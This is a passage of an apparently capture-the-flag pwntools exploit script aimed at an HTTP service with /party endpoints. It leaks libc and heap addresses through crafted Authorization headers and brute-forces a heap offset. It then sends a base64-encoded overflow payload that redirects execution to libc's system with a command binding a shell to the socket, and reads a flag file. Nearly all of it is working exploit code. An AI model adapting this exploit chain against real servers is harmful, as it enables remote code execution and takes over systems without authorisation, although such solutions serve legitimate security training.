    return process([BINARY] + ARGS, env=ENV, **kw)

  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)


vm = setup()

#===========================================================
#                   EXPLOIT STARTS HERE
#===========================================================
# Arch:       amd64-64-little
# RELRO:      Full RELRO
# Stack:      Canary found
# NX:         NX enabled
# PIE:        PIE enabled
# SHSTK:      Enabled
# IBT:        Enabled
# Stripped:   No
# Comment:    GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0

def build_header(path, method, data=None, cookie=None, data_len=None, headers=None):
  if headers is None:
    headers = list()

  if data and data_len is None:
    data_len = len(data)

  if data_len is not None:
    headers += [f'Content-Length: {data_len}\r\n'.encode()]

  if cookie is not None:
    headers += [f'Cookie: {cookie}\r\n'.encode()]

  return flat(
      byt(method), b' ', byt(path), b' HTTP/1.1\r\n',
      b'Host: ', f'{IP}:{PORT}\r\n'.encode(),
      headers,
      b'\r\n'
    )

libc = ELF('./libs/libc.so.6', checksec=False)


# token = flat(b'Authorization: Bearer ', b64e(b'ornithorhynchus anatinus').encode(), b'\r\n')
token = flat(b'Authorization: Bearer ', b64e(p64(0x6fe1be2)).encode(), b'\r\n')
leak_libc_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
leak_heap_token = flat(b'Authorization: Bearer ', b64e(cyc(0x11)).encode(), b'\r\n')

p = lprog("Brute heap off")
for i in range(0x1000):
  p.status(f"{i}")
  t = get_target()
  if not args.REMOTE:
    s = t
    sleep(3 if args.GDB else .5)
  else: 
    se(build_header('/restart', 'GET', headers=[token]))
    cl()
    sleep(.5)

  t = get_target() if args.REMOTE else remote('localhost', 8080) 

  se(build_header('/party', 'GET', headers=[leak_libc_token]))
  ru(b'invalid: x')
  libc.address = (upad(ru(b'Party', drop=True)) << 8) - 0x204200
  lhex(libc.address, "libc")

  # c 1
  se(build_header('/party', 'GET', headers=[leak_heap_token]))
  ru(b'invalid: ' + cyc(0x11))
  HEAP = (upad(ru(b'Party', drop=True)) << 8)
  HEAP -= (0x9200 if args.LOCAL else 0x9400) if args.REMOTE else 0x8d00
  lhex(HEAP, "heap")

  se(build_header('/party', 'POST', headers=[token]))
  ru(b'\r\n\r\n')

  # cmd = b'cp /nginx/flag.txt /challenge/flag.txt;'
  cmd = b'exec<&3;sh>&3;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

  se(build_header('/party', 'DELETE', headers=[token]))
  try:
    sl('echo PWN; id; cat /nginx/flag.txt;')
    ru('PWN')
    it()
  except EOFError:
    cl()
    continue


# data = cyc(0x6f)
# for i in range(0x8):
# se(build_header('/party', 'PUT', data, headers=[token]) + data)
# ru(b'\r\n\r\n')


# c 3 
# se(build_header('/party', 'GET', headers=flat(b'Authorization: Bearer ', b64e(cyc(0x1000)).encode(), b'\r\n')))
# ru(b'\r\n\r\n')


t.interactive() # or it()

Navigation